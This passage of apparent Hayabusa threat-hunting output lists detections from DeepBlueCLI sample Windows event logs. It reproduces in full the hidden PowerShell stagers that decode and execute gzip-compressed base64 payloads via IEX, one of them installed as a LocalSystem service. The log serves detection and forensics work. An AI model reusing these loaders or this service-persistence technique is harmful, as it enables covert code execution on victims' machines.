YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTV